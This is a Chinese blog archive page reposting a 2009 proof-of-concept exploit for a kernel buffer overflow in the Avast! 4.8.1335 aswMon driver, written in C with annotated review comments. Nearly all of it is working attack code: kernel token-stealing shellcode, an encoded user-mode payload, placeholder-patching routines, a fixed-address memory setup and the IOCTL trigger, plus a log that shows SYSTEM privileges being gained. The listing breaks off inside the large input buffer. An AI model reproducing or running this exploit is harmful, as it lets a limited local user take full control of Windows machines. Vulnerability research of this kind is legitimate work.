标签为 "安全防护" 的存档

Avast! 4.8.1335 专业版本地核心缓冲区溢出漏洞

      Avast! 4.8.1335 专业版的文件系统过滤驱动(设备名 \\.\aswMon)存在本地内核缓冲区溢出漏洞,允许本地受限用户账户在 Windows 平台上提升至 SYSTEM 权限。注意:下文的 PoC 硬编码了该驱动的 IOCTL 码(0xb2c8000c)以及针对 Windows XP(示例输出为 5.1.2600)的内核/用户态地址,在其他系统版本上通常无法直接使用;运行它会直接触发驱动崩溃,只适合在隔离的测试环境中验证。

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>
#include <windows.h>
#include <winioctl.h>
#include <tlhelp32.h>

/*
Program          : avast! 4.8.1335 Professionnel
Homepage         : http://www.avast.com
Discovery        : 2009/07/29
Author Contacted : 2009/07/31
Found by         : Heurs
This Advisory    : Heurs
Contact          : heurs@ghostsinthestack.org

//----- Application description

avast! antivirus software represents complete virus protection,
offering full desktop security including a resident shield.
This antivirus is certified by both ICSA Labs and West Coast
Labs Checkmark.

//----- Description of vulnerability

The File System Filter driver is prone to a local kernel buffer overflow.
This vulnerability allows an intruder to gain SYSTEM privileges on a Windows
system from a limited user account.

//----- Proof Of Concept

http://www.sysdream.com/LocalEscalation_Avast.rar

//----- Credits

http://www.sysdream.com
http://ghostsinthestack.org

s.leberre at sysdream dot com
heurs at ghostsinthestack dot org

//----- Greetings

Virtualabs

//----- Exploitation

###############################################
Avast Kernel Buffer Overflow Vulnerability
Proof Of Concept…

===> Found : LocalEscalation_Avast.exe : 2676

Shellcode PID Uploaded !
Shellcode Redirect Uploaded !
Shellcode Stack Uploaded !
Connecting…    Found !
Handle : 0000001C
Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\eleve\Bureau>whoami
SYSTEM
###############################################
*/

/*
 * 19-byte hand-assembled x86 stub that main() copies to 0x57523c00,
 * immediately ahead of ShellcodeMaster.  Decoded:
 *   5E                pop  esi
 *   81 EE 6B 03 00 00 sub  esi, 0x36B
 *   81 C6 30 9E 00 00 add  esi, 0x9E30
 *   C7 06 00 00 00 00 mov  dword ptr [esi], 0
 * NOTE(review): it zeroes one dword at a fixed displacement from whatever
 * return address is on top of the stack when it runs; the target inside
 * aswMon is not documented anywhere in this file.
 */
char UpdateAswMon [] = {
       0x5E, 0x81, 0xEE, 0x6B, 0x03, 0x00, 0x00, 0x81, 0xC6, 0x30, 0x9E, 0x00, 0x00, 0xC7, 0x06, 0x00,
       0x00, 0x00, 0x00
   };

/*
 * Kernel-mode payload, copied right after UpdateAswMon at 0x57523c00.
 * Three 4-byte placeholders are patched in place by main() before use:
 *   0x41414141 -> PID of this process          (MajShellcode)
 *   0x11111111 -> address of RealShellcode     (MajRealShellcode)
 *   0x22222222 -> a user-mode stack address    (MajRealStack)
 * The code reads fs:[0x124], follows +0x44 and +0x88, then walks a linked
 * list comparing the dword at [node-4] against the PID placeholder and
 * against 4; once both nodes are found it copies one dword at +0x40 from
 * the "4" node into the PID node.  It finishes with
 * mov eax,0x3b / mov fs,ax / sysexit, with edx = the 0x11111111 slot and
 * ecx = the 0x22222222 slot (SYSEXIT resumes at EDX with ESP = ECX).
 * NOTE(review): this looks like the classic Windows XP token-copy layout,
 * but the offsets are hard-coded for the author's XP build and are not
 * verified here; they are not valid on other builds.
 * sizeof(ShellcodeMaster) includes the string's NUL terminator.
 */
char ShellcodeMaster[] = "\x33\xf6\x33\xff\x64\xa1\x24\x01\x00\x00\x8b\x40\x44\x05\x88\x00"
"\x00\x00\x8b\xd0\x8b\x58\xfc\x81\xfb\x41\x41\x41\x41\x75\x02\x8b"
"\xf0\x83\xfb\x04\x75\x02\x8b\xf8\x8b\xd6\x23\xd7\x85\xd2\x75\x08"
"\x8b\x00\x3b\xc2\x75\xde\xeb\x10\x8b\xc7\xb9\x40\x00\x00\x00\x03"
"\xc1\x8b\x00\x8b\xde\x89\x04\x19\xba\x11\x11\x11\x11\xb9\x22\x22"
"\x22\x22\xb8\x3b\x00\x00\x00\x8e\xe0\x0f\x35";

/*
 * User-mode payload: its address is patched into ShellcodeMaster's
 * 0x11111111 slot, so execution lands here after the kernel payload's
 * sysexit.  It begins with an fnstenv-based self-decoding XOR stub
 * (\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13 ...), so the decoded payload
 * is not readable from this listing.  The session log in the file header
 * shows the end result as a command prompt running as SYSTEM.
 * NOTE(review): the array is referenced by address only (never executed
 * from its own buffer by this process), so its location must be readable
 * and executable when the kernel returns to it — DEP would break this.
 */
char RealShellcode[] = "\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x15"
"\xf3\x1d\xb8\x83\xeb\xfc\xe2\xf4\xe9\x1b\x59\xb8\x15\xf3\x96\xfd"
"\x29\x78\x61\xbd\x6d\xf2\xf2\x33\x5a\xeb\x96\xe7\x35\xf2\xf6\xf1"
"\x9e\xc7\x96\xb9\xfb\xc2\xdd\x21\xb9\x77\xdd\xcc\x12\x32\xd7\xb5"
"\x14\x31\xf6\x4c\x2e\xa7\x39\xbc\x60\x16\x96\xe7\x31\xf2\xf6\xde"
"\x9e\xff\x56\x33\x4a\xef\x1c\x53\x9e\xef\x96\xb9\xfe\x7a\x41\x9c"
"\x11\x30\x2c\x78\x71\x78\x5d\x88\x90\x33\x65\xb4\x9e\xb3\x11\x33"
"\x65\xef\xb0\x33\x7d\xfb\xf6\xb1\x9e\x73\xad\xb8\x15\xf3\x96\xd0"
"\x29\xac\x2c\x4e\x75\xa5\x94\x40\x96\x33\x66\xe8\x7d\x8d\xc5\x5a"
"\x66\x9b\x85\x46\x9f\xfd\x4a\x47\xf2\x90\x70\xdc\x3b\x96\x65\xdd"
"\x15\xf3\x1d\xb8";

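/*
 * Returns the PID of the first running process whose image name equals
 * name_Proc (case-insensitive, as reported by the toolhelp snapshot).
 * On any failure — snapshot creation, first enumeration, or no match —
 * it prints a message, waits for a key and exits the program (with status
 * 0, as in the original; callers never see an error return).
 *
 * Fix: the snapshot handle is now closed on every path.  The original
 * leaked it when the very first entry matched and when nothing matched.
 */
int GetPidByName(char * name_Proc) {
    PROCESSENTRY32 PEntry;
    HANDLE hTool32;
    BOOL more;

    PEntry.dwSize = sizeof(PROCESSENTRY32);   /* required before Process32First */
    hTool32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hTool32 == INVALID_HANDLE_VALUE) {
        printf("\nError ==> CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)");
        getch();
        exit(0);
    }
    if (!Process32First(hTool32, &PEntry)) {
        printf("\nError ==> Process32First(hTool32, &PEntry)");
        CloseHandle(hTool32);
        getch();
        exit(0);
    }

    /* Process32First has already filled in the first entry; examine it,
     * then keep pulling entries with Process32Next until it reports none. */
    for (more = TRUE; more; more = Process32Next(hTool32, &PEntry)) {
        if (strcasecmp(PEntry.szExeFile, name_Proc) == 0) {
            DWORD pid = PEntry.th32ProcessID;
            CloseHandle(hTool32);
            printf("===> Found : %s : %lu\n\n", PEntry.szExeFile, (unsigned long) pid);
            return (int) pid;
        }
    }

    CloseHandle(hTool32);
    printf("\n%s n'a pas ete trouve.", name_Proc);
    getch();
    exit(0);
}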

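/*
 * Writes the PID of ProcessName over the first 4-byte 0x41414141
 * placeholder in ShellcodeMaster, little-endian (the byte order the
 * embedded `cmp ebx, imm32` expects).  Prints whether a slot was patched.
 *
 * Fix: the scan stops 4 bytes before the end of the array so memcmp never
 * reads past it; the original compared 4 bytes starting at every index up
 * to the last one, reading up to 3 bytes beyond the buffer.
 * (sizeof(ShellcodeMaster) includes the string's NUL terminator.)
 */
void MajShellcode(char * ProcessName){
     DWORD ProcessID;
     DWORD MagicWord = 0x41414141;
     size_t i;

     ProcessID = GetPidByName(ProcessName);   /* exits the program if not found */
     for (i = 0; i + sizeof(MagicWord) <= sizeof(ShellcodeMaster); i++) {
         if (memcmp(ShellcodeMaster + i, &MagicWord, sizeof(MagicWord)) != 0)
             continue;
         /* Explicit little-endian store, independent of host layout. */
         ShellcodeMaster[i]     = (char)( ProcessID        & 0xFF);
         ShellcodeMaster[i + 1] = (char)((ProcessID >>  8) & 0xFF);
         ShellcodeMaster[i + 2] = (char)((ProcessID >> 16) & 0xFF);
         ShellcodeMaster[i + 3] = (char)((ProcessID >> 24) & 0xFF);
         printf("Shellcode PID Uploaded !\n");
         return;
     }
     printf("Shellcode PID NOT Uploaded :\'(\n");
     return;
}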

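/*
 * Writes the address of RealShellcode over the first 4-byte 0x11111111
 * placeholder in ShellcodeMaster, little-endian.  In the kernel payload
 * that slot ends up in EDX, the return EIP used by its sysexit.
 *
 * Fix: the scan is bounded so memcmp never reads past the end of
 * ShellcodeMaster (the original scanned up to the last byte).  The pointer
 * is truncated through DWORD_PTR rather than straight to DWORD; on the
 * 32-bit target the value is identical.
 */
void MajRealShellcode(){
     size_t i;
     DWORD MagicWord = 0x11111111;
     DWORD Target = (DWORD)(DWORD_PTR) RealShellcode;

     for (i = 0; i + sizeof(MagicWord) <= sizeof(ShellcodeMaster); i++) {
         if (memcmp(ShellcodeMaster + i, &MagicWord, sizeof(MagicWord)) != 0)
             continue;
         ShellcodeMaster[i]     = (char)( Target        & 0xFF);
         ShellcodeMaster[i + 1] = (char)((Target >>  8) & 0xFF);
         ShellcodeMaster[i + 2] = (char)((Target >> 16) & 0xFF);
         ShellcodeMaster[i + 3] = (char)((Target >> 24) & 0xFF);
         printf("Shellcode Redirect Uploaded !\n");
         return;
     }
     printf("Shellcode Redirect NOT Uploaded :\'(\n");
     return;
}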

/*
 * Intended to return the caller's stack pointer, but with GCC's AT&T
 * operand order `mov %eax, %esp` copies EAX *into* ESP (source first), not
 * ESP into EAX; `leave` then reloads ESP from EBP, so the function returns
 * whatever EAX happened to contain.  There is no C return statement — the
 * asm `ret` leaves the function (compilers warn about this).
 * NOTE(review): MajRealStack() ignores the returned value anyway and uses
 * the address of its own local instead, so this function is effectively
 * dead code.  Only meaningful on 32-bit x86.
 */
int FindStack(){
     __asm__(
       "mov %eax, %esp\n\t"
       "leave\n\t"
       "ret\n\t"
       );
}

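/*
 * Writes a user-mode stack address over the first 4-byte 0x22222222
 * placeholder in ShellcodeMaster, little-endian.  In the kernel payload
 * that slot ends up in ECX, the ESP restored by its sysexit.
 *
 * The value written is the ADDRESS of the local StackLocation — i.e. a
 * pointer into this thread's stack — not the result of FindStack(), which
 * is computed and then never read.  That is kept exactly as the original
 * did it; presumably any valid address inside the current stack suffices.
 *
 * Fix: the scan is bounded so memcmp never reads past the end of
 * ShellcodeMaster (the original scanned up to the last byte).
 */
void MajRealStack(){
     size_t i;
     DWORD MagicWord = 0x22222222;
     DWORD StackLocation = FindStack();          /* value unused, see above */
     DWORD Target = (DWORD)(DWORD_PTR) &StackLocation;

     for (i = 0; i + sizeof(MagicWord) <= sizeof(ShellcodeMaster); i++) {
         if (memcmp(ShellcodeMaster + i, &MagicWord, sizeof(MagicWord)) != 0)
             continue;
         ShellcodeMaster[i]     = (char)( Target        & 0xFF);
         ShellcodeMaster[i + 1] = (char)((Target >>  8) & 0xFF);
         ShellcodeMaster[i + 2] = (char)((Target >> 16) & 0xFF);
         ShellcodeMaster[i + 3] = (char)((Target >> 24) & 0xFF);
         printf("Shellcode Stack Uploaded !\n");
         return;
     }
     printf("Shellcode NOT Uploaded :\'(\n");
     return;
}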

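/*
 * Prints every entry of the current directory to stdout, one name per
 * line.  main() calls it right after the two DeviceIoControl requests —
 * NOTE(review): presumably to generate file-system activity through the
 * filter driver, but the reason is not stated anywhere in this file.
 *
 * Fix: the original declared a 1024-byte `Dossier` buffer, never
 * initialised it, and passed it to SetCurrentDirectory().  Reading that
 * buffer was undefined behaviour and the call could only fail or change
 * to an arbitrary directory; it is dropped, so the listing is always of
 * the current directory.  FindClose() is now only called on a valid
 * search handle.
 */
void AfficherListeFichiers(void) {
    HANDLE hFind;
    WIN32_FIND_DATAW FindData;

    hFind = FindFirstFileW(L"*.*", &FindData);
    if (hFind == INVALID_HANDLE_VALUE)
        return;                     /* nothing to list, or access denied */

    /* FindFirstFileW already returned the first entry, hence do/while. */
    do {
        printf("%ws\n", FindData.cFileName);   /* %ws: MSVC/MinGW wide-string spec */
    } while (FindNextFileW(hFind, &FindData));

    FindClose(hFind);
}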

/*
 * Entry point of the PoC.  Steps (compare the session log in the header):
 *   1. patch the three placeholders in ShellcodeMaster: PID of this
 *      executable (it must be named LocalEscalation_Avast.exe), the
 *      address of RealShellcode, and a stack address;
 *   2. reserve+commit an RWX region at the fixed address 0x57520000 and
 *      copy UpdateAswMon followed by ShellcodeMaster to 0x57523c00;
 *   3. open \\.\aswMon, retrying once a second until it succeeds, and
 *      send IOCTL 0xb2c8000c twice with the Crashing buffer as input and
 *      no output buffer;
 *   4. list the current directory (AfficherListeFichiers), then exit.
 *
 * NOTE(review):
 *  - neither VirtualAlloc result is checked; if 0x57520000 is unavailable
 *    the memcpy to 0x57523c00 faults.  ShellcodeToExecute is assigned but
 *    never read.
 *  - 0xb2c8000c decodes (CTL_CODE) as device type 0xb2c8, function 3,
 *    METHOD_BUFFERED, FILE_ANY_ACCESS.  Return values and NombreByte are
 *    ignored; the request is simply sent twice.
 *  - all addresses and the IOCTL code are hard-coded for the author's
 *    Windows XP target (log shows 5.1.2600).
 *  - welcome, out and choix are set up / declared but never used.
 *  - getch() is declared in <conio.h>, which this file does not include.
 *  - (void*)0x57523c00 + sizeof(...) is pointer arithmetic on void*, a
 *    GCC extension.
 */
int __cdecl main(int argc, char* argv[])
{
    HANDLE hDevice = (HANDLE) 0xffffffff;   /* == INVALID_HANDLE_VALUE */
    DWORD NombreByte;
    DWORD InitVal=0;
    char welcome[1024], out[50];
    /* Opaque input buffer for the IOCTL.  Its layout is not documented
     * anywhere in this file; treat it only as "the bytes the author sent". */
    DWORD Crashing []={
        0x73d1dde9, 0x24135758, 0xcd62b301, 0x35a96b72,
        0x45c3745d, 0xcfae802b, 0xed77fbb8, 0xecc2f16d,
        0xa6409255, 0x5b608056, 0x7b2e40db, 0xc250e10c,
        0x284fc4b1, 0xbab9b00d, 0x2fce932c, 0x42d9380b,
        0x72b21bd3, 0x4646eb4c, 0xdfcc6996, 0x4060e991,
        0xce1fa555, 0xeda7ae0b, 0x4f918340, 0x90059feb,
        0xf4cf7bb7, 0x8b0c9a64, 0x9b99f867, 0xd673970a,
        0x591dbc4c, 0x2d54989b, 0xddb9c19d, 0x8121eaac,
        0x199b21f5, 0xc30a1e03, 0x7c618cb1, 0xeb3e06f0,
        0x7cebbd74, 0xaef8a969, 0x25cdcda9, 0xf47297c9,
        0x58855260, 0x9b494eaa, 0x0c11e290, 0x4f1a6361,
        0x75063159, 0xc791bf70, 0x3a1751db, 0xf439049a,
        0x83abe375, 0xba84ad33, 0x3ca8acac, 0x17d3fd7e,
        0x319c0280, 0xcd69a6c1, 0x3fdcdfe6, 0xc3903332,
        0x1377c51c, 0x1cd14365, 0xa98d77f0, 0xd5746f3f,
        0xb3cb7cb2, 0xddd2ecf4, 0x6cb9baa0, 0x4b0e045a,
        0x98b7c236, 0x1203e0e5, 0x32449810, 0xaeb428f7,
        0xa2e7e6e3, 0x3b0443af, 0x1145d62b, 0xaff5c263,
        0xc496b3d7, 0x0b1c45d9, 0x8a463e85, 0x041251c8,
        0x1341294d, 0xacc885c9, 0x03c3b5e7, 0x4cd36063,
        0xbeec4324, 0x313554a7, 0x3b202113, 0xe836e635,
        0x5d65c8bd, 0x8d52bae6, 0x24b3ba7f, 0x9b781fa7,
        0x7efa8335, 0x73e87501, 0x316fcbe4, 0xfcc446bc,
        0x3697162d, 0x5f706b56, 0x3d74846f, 0x57b41e55,
        0x44b39b19, 0x40e6bf38, 0xa1d3527c, 0x20f6b70c,
        0xa772ce22, 0x876cdf3b, 0xa948a3ad, 0x054c9fd6,
        0x6ea65a25, 0x432a376f, 0x4217baa1, 0xd38f0661,
        0x2c40d3d8, 0x33a62f9a, 0x5a8ef7d8, 0x4d07effa,
        0x8ba68789, 0x1441d661, 0xf2f6d48f, 0x77e5d2ae,
        0xcc69ac3e, 0x26cc9de9, 0xd7518e7e, 0xc568abea,
        0x21089cf3, 0xdc3c48a5, 0x6110d1b2, 0x39f65dc9,
        0xd0b8055d, 0xd8cab72c, 0x26be700a, 0x5f028b6c,
        0x1af4a25d, 0xbae98a7c, 0x1d5e94ed, 0xb743fb4a,
        0x274eaede, 0xe84bc6c6, 0xbcc3dd24, 0x47c6b5d5,
        0x3f5a530f, 0x4bbd205e, 0xe5ed455d, 0xc23908e3,
        0xa7255550, 0xfeee9e59, 0x8d91a28c, 0x27f1cd56,
        0xbb7d2468, 0x2e53ae6f, 0x3d8ea58a, 0x9832f31e,
        0x87aca912, 0xf5607f93, 0x67e4d74e, 0xcffd3adf,
        0x38bda32a, 0x1ace8bf1, 0x16ad790d, 0xe7b78a4a,
        0x6e4a4f52, 0xa963805f, 0xb44512ab, 0xaaff642a,
        0x68723e9a, 0x9cb006f2, 0x73439f5a, 0xcca9abc0,
        0x755ec72c, 0xb90d959c, 0x96f5fed2, 0x54821cac,
        0x6d3b9e97, 0x254fa473, 0xe5806bdf, 0x1d3fe779,
        0x5d824e9c, 0x0cba2490, 0x86dafdd4, 0xb84d19dd,
        0x1cf0ecc5, 0x73a4c777, 0x6545b564, 0x12fc70dd,
        0x58357dcd, 0x70524921, 0xa4bf0661, 0xd3630be2,
        0xb4f95085, 0x2f8e9f3f, 0x8fb2c303, 0x5d534373,
        0x330ed7be, 0x090a7fee, 0x70a0936f, 0x91bc5628,
        0x2ad2a9fb, 0x437d15d2, 0xcb860a99, 0x8bbf5d22,
        0x5188ce41, 0xf419337b, 0xfe338d2c, 0xf397167d,
        0xb79f4c9a, 0x982b7bd0, 0xeda0e308, 0x19079984,
        0x44506743, 0x08eb3bff, 0x0b2c7b5e, 0xfc12c449,
        0x122c18c3, 0xcb18effc, 0x65070b56, 0x5bbc5f36,
        0xba194a66, 0x1ac6b812, 0x4936b720, 0x3064f4d9,
        0xea85383a, 0x5669ab43, 0xbfb9b2be, 0x2c961814,
        0x2a16193f, 0x5310fc35, 0x2dcf5351, 0x8fb793bf,
        0x0b4f51df, 0x7f9c69f8, 0x76bbd7bc, 0xc2cd8ee9,
        0xdaded21e, 0xeeb83782, 0xa45e26a1, 0xa94133c2,
        0xaec536ad, 0xa6026a8c, 0xbcb5a191, 0xd7babca3,
        0xb2d31f46, 0x19511dc1, 0x21437e92, 0x0bfaa87e,
        0x32685945, 0x55016b49, 0x994f9293, 0x599f9653,
        0xc492d42b, 0xfa4d8907, 0x6c1e0416, 0x073e9847,
        0x9ceee897, 0x479dec42, 0x60f26898, 0xa0b37906,
        0x7f433088, 0xe617b52a, 0x30df4460, 0x9945c0da,
        0x5f4f9196, 0x5b3095ad, 0x41e4f285, 0x225b324a,
        0xe5f83ba7, 0xbadf8b56, 0xc732f28d, 0xaa94e0d7,
        0x0f9da105, 0x80936817, 0xa3b40d2e, 0xa7d5791c,
        0x10b0a9bb, 0x83b95622, 0x32872694, 0x7b1b3d10,
        0xe0e1adf8, 0x32512498, 0x6bc6ff89, 0x0d11fef7,
        0x3875c984, 0x5a31db0e, 0xdd1df94b, 0x61148636,
        0x7372b587, 0x8856950e, 0x4f0af062, 0xb49ea480,
        0x799ce35e, 0x23ecabd9, 0x137ee004, 0xdd17f948,
        0xf2026141, 0x8afd0e45, 0x1188ac9a, 0x0f87f038,
        0xee43edef, 0x982bf738, 0x78b3ca5f, 0x4d8345d3,
        0x613e2505, 0x16ab7e08, 0xa7e68888, 0xa59d234c,
        0x61655904, 0xbec0d39c, 0x3d0d18b0, 0x8eb7a653,
        0x6bd2ad6f, 0x3fa66b0f, 0x5951c36f, 0x8e5c4bed,
        0x087d3d72, 0x65fdb9b3, 0x7aa0c8a5, 0x26c78496,
        0x3a8946f1, 0xb65f63b2, 0xeacb180d, 0xbda32816,
        0x424f7b1e, 0x667fb713, 0xfe8d6f2c, 0x7f3711ca,
        0x477ecf54, 0xbf36b283, 0x92a7518e, 0xfa378a84,
        0x9ddc8f83, 0xc844b947, 0x3ef9ab12, 0xe892b5b4,
        0x101854b2, 0x8f45e397, 0xa1b134ed, 0x5c2a4d5c,
        0xa887258a, 0xbea01c90, 0xfb77c826, 0x08e87f98,
        0x6c7b0709, 0x1f27fe7d, 0xe9d4d75f, 0xd3ecbaee,
        0x961a35c6, 0x8317caf4, 0xc93141a0, 0x71c2fa12,
        0x79afe953, 0x7024a929, 0x5187beec, 0x439aa4c4,
        0x1b5bf729, 0x20de52a2, 0x5afd531b, 0xcbc6d1dc,
        0x8a6c775d, 0x93823634, 0x31e3c106, 0x5c4756ec,
        0xb322318f, 0x8a8fe323, 0x7d8a483f, 0x538d06a5,
        0xd23e0864, 0x07739d15, 0x46845d65, 0xa90ed2a1,
        0x907709ae, 0x25c51a18, 0x7b361c60, 0xf7f12530,
        0xb5c8b862, 0x1e5579b7, 0x453fde63, 0x5854951c,
        0xb479e4b4, 0x0187185f, 0xe310f406, 0xc5ae83f5,
        0x385149c8, 0xe0538b56, 0x6ffa1c0f, 0x15a8c111,
        0xb901feb0, 0x5cb53fcf, 0x7b9596dd, 0xbedc1ead,
        0x6ea7517e, 0xf1c88cdb, 0x2cf213af, 0x67ebce96,
        0x458465ce, 0x6503c018, 0xf7d61a9b, 0xbb31a712,
        0xe0dc951b, 0x354a28a8, 0x51ecebf3, 0xdbf8e424,
        0xd71a0cd2, 0x708d5b40, 0xdd1cf833, 0xb4be28a4,
        0x41c589c0, 0x5d81889f, 0x97de9f7a, 0x43b18278,
        0x4c312b46, 0x2ec1048d, 0x438d30d9, 0xab7923d6,
        0xd36d6ed0, 0xb6165ede, 0x95369795, 0xd5b1b776,
        0x60fe0b11, 0x087563ae, 0xa709eacf, 0xededbbea,
        0xf134d8ea, 0x1e241ce6, 0x341248d6, 0x6c16117a,
        0x7517ff23, 0x4dfb2eda, 0x7cc84423, 0x96cf942d,
        0x32901498, 0xe3bc3a5d, 0x0b85bdb2, 0x7baf09ca,
        0x6c7b4c01, 0xb3a72934, 0x4d33e464, 0x7dc1cf69,
        0x166756c6, 0x08f5f62f, 0x3db6b309, 0xce886208,
        0x1daf5a03, 0xc724741a, 0xf052f4ed, 0x4297acad,
        0xdc6a5dfe, 0xd0c4a895, 0x97db4437, 0x6e227c97,
        0x05f4dab0, 0x13b4adf4, 0x0d8b71e6, 0x9ff6843d,
        0x0fdb8939, 0x58850dfd, 0x2b21f28e, 0x2603e115,
        0xb09ba646, 0xd6fe719b, 0xe87a9223, 0x18f3b642,
        0x4fb62852, 0xeda5dd40, 0x6e5dbbf4, 0x703a2f1f,
        0x4884a549, 0xb6b85046, 0xdbbb7868, 0xa38e09a3,
        0x66c6fa13, 0xea16a377, 0x1ced6fd3, 0x44a3e920,
        0xfe995619, 0x822d3af3, 0xe8399736, 0xa6ff023c,
        0x19b88da8, 0x9b26e290, 0xc6970f3e, 0x4607d070,
        0x7db5bfd9, 0xbdcc2cd7, 0x946faaf6, 0xfcd89b65,
        0x17712dee, 0x953a0c3f, 0xf1383334, 0xc32e8a92,
        0xeb678cf4, 0xb5265c91, 0x10ec1b31, 0x6d134dc1,
        0x8ae8143e, 0x26ff3968, 0xf579d43c, 0x8f9d85f3,
        0x02fad6bf, 0x3a7be637, 0xeff5542c, 0x71cd227a,
        0x4345de8e, 0x5c9202c7, 0x388f640c, 0x0de7d2cd,
        0xe9b74263, 0xe443d4ef, 0x9cabf0e1, 0x810b8762,
        0x23c14d38, 0x296bd907, 0xdfc31794, 0x026b9455,
        0x7632bccd, 0x8dcf7332, 0x23dcc4c2, 0x32885977,
        0x548fdcc5, 0x9fca128a, 0x294fbc82, 0xf7bcd7db,
        0x9cdcc0a9, 0xe26aec68, 0x04c39cf4, 0x0a8d0d2b,
        0xf72bdf30, 0xff04366a, 0x07e7b40a, 0x9b3b9d18,
        0x859b4b85, 0x53a44769, 0x0b1366e3, 0x39f4c10b,
        0xb1ccbe45, 0x9d31874e, 0xa8e0a3a6, 0x98d4a7d0,
        0xc24240f5, 0x421301e0, 0x09137099, 0x48d2a2dd,
        0x3f0fdb4a, 0xe1a9eb43, 0x84199aff, 0x4eff2f35,
        0xd52f92fd, 0xe99cb709, 0xcb8fc9ce, 0x4cd97110,
        0x035f2194, 0x87e8e12d, 0xecd7a018, 0xff80434f,
        0x5ad4430c, 0x51015613, 0x153a3cf8, 0x8bbb9e84,
        0x31bc1b01, 0x986e7b5e, 0x4708de0c, 0xe51a3ef6,
        0xd279b566, 0x4054b421, 0xd794d868, 0x5e174bd2,
        0xc9480f43, 0x61e1ac80, 0x65c89d78, 0xcc461265,
        0x6f8099a7, 0x76596a5c, 0xe134710e, 0x6ec09d49,
        0x095b4232, 0x251f6d2c, 0xb61f7712, 0x6031640c,
        0x081bb50e, 0xabfcf1aa, 0x303d79f3, 0x4e3caaa9,
        0xf87540ed, 0xf067072c, 0xe1e7f3a1, 0x82dd570b,
        0x2110f555, 0x988cc833, 0x985002b4, 0xedd3b5c3,
        0xf952a2cd, 0x06159e37, 0x1ac3e607, 0xda6888dc,
        0x534a76c9, 0x2a7a4148, 0xb5433071, 0x392f077a,
        0x4f91ca6e, 0x0c7736e0, 0x780dd6ed, 0x626f3aa9,
        0x26db5cac, 0xd12bc3e6, 0x70d14be1, 0x0bc60171,
        0x97203228, 0x66463a8d, 0x0ac460d4, 0xdf1906b3,
        0x0d19058b, 0xaa96fa9a, 0x8b220888, 0xfad29e31,
        0x90049f60, 0xb44780ab, 0xe52554ea, 0xe97a3e9e,
        0x2142a187, 0x6ba5f497, 0xf43334a9, 0xf9fb1c87,
        0x3d1f1949, 0x064149d5, 0x2e39a1e9, 0x35669c1b,
        0x0345c538, 0x623002d5, 0xa280da3a, 0xd32bc66c,
        0x047c437f, 0x2b60c09c, 0x154931e8, 0x2b316b42,
        0xa97028bb, 0x1b26881f, 0x0d93499d, 0xa681e3d0,
        0x64aed3a1, 0xb904296b, 0x6e8ef9c5, 0xc029dbe4,
        0x4c1968ca, 0xacceed0c, 0x0f137d05, 0x71b80cdb,
        0xd0e3a334, 0xab958932, 0x336c6a26, 0x42626069,
        0x2a2d154b, 0x14347b3a, 0xac80cd31, 0x9e9708d5,
        0x1641542a, 0x25d2dd4e, 0x5c434b1d, 0x070569b9,
        0xf0f63b05, 0x2e8328a8, 0xd263cf7b, 0xea1a2370,
        0xcbc81d0b, 0xf2a0075b, 0x141c700e, 0x10628529,
        0x6cec92e5, 0x4aa5f3d6, 0x6c3d960f, 0x942d9d60,
        0x896d6d23, 0xa29ef00b, 0x0502a28d, 0x712f7787,
        0x5235ed70, 0x8945f3eb, 0x4f1ecbdd, 0xb5f457b9,
        0xe7327495, 0xbdc47980, 0x85bf54c1, 0xe054753d,
        0x42e6c82b, 0xb54389bb, 0xef5debf3, 0xcf310c8e,
        0x2a433c26, 0xf209dc9d, 0x8a869d03, 0x45961943,
        0x28f51bb9, 0x643e865c, 0xb410b2d1, 0xaf30a98c,
        0xa004bb79, 0x956b7c41, 0x13e3a21d, 0xca5f4efd,
        0xf13e81c1, 0x4fb74a1e, 0x2a033efb, 0x91ed2e36,
        0xb9bf8c57, 0xc1b65238, 0x2b3b3e0f, 0xbc02c76b,
        0xc56d0a7d, 0xb33685c2, 0x6619d068, 0x13ceb219,
        0x21e2d381, 0xbc04a013, 0xafc763ef, 0xc6c9651d,
        0x9139fb86, 0xdd6fe175, 0x5334d9d7, 0x4b39bc0e,
        0x42035a82, 0x91cba15e, 0xcf931d84, 0x739e2767,
        0x5a1c76fd, 0xd65cb444, 0x02c608e9, 0xc13aa613,
        0x5f9895ec, 0x05928739, 0xd960be14, 0xbc65f387,
        0xb40abdb8, 0x3833c113, 0x1fa8b468, 0x8e907e66,
        0xbca30fa5, 0xef539907, 0x3f130c64, 0xaf133b06,
        0x06d0d5c8, 0xe3e4f1df, 0x185f733d, 0x7ecf9d1e,
        0xdfea3362, 0x33bedbe3, 0xe9a15aed, 0x4aa68eeb,
        0x01e0aaf1, 0xb5ccf205, 0x9426c4cc, 0x3f80b9b4,
        0x017b584a, 0x7ac85b06, 0x4ca27f77, 0x7d8548a2,
        0x19025a74, 0x1d4d204c, 0x0cccb981, 0xf86a72e6,
        0x2a5ef939, 0x778bfe20, 0xf536a9e7, 0x82482d36,
        0x20a8484b, 0x8c08dd85, 0xc82a0739, 0xed52e038,
        0x4e6f5973, 0xd799c606, 0x87dd5c7f, 0x69db7ac2,
        0x56771978, 0xf682c73f, 0x40e5511c, 0xf373bc10,
        0xdecc0fa4, 0xf070df4e, 0x81b33f54, 0xf1d53816,
        0x2c2173e5, 0xae5a23d2, 0x0b9013fd, 0x9005857b,
        0x495aa603, 0x7d7b69b9, 0x80603698, 0xeedd2b37,
        0xaf7f72ea, 0xbe303f21, 0x0ea977f9, 0x0fa0708b,
        0xb5792aa6, 0x87fd2a7e, 0x2bda1cd6, 0x5df64225,
        0x216accb9, 0xc1808941, 0x582679b3, 0x46fbd44d,
        0xe2f76929, 0x548f6e51, 0x4ac3f5d8, 0xe52e62af,
        0x484110c2, 0x492fab5a, 0x2c7accea, 0x7488ca20,
        0xe36a2f99, 0xba1e3785, 0xefa467bc, 0xd4665fc8,
        0x2f5390e2, 0xfe450203, 0xbb624253, 0x551740a0,
        0x7d50b6c9, 0xe9d20aa0, 0x55e69c01, 0x6ab186ee,
        0x1c187ff3, 0x6ce6dff2, 0x120a6ce0, 0xf6c45fd2,
        0x5832b533, 0xb02e3027, 0x170d3041, 0x6f153144,
        0xad980d7f, 0x49f5d3ab, 0xcedca059, 0x3db83dc5,
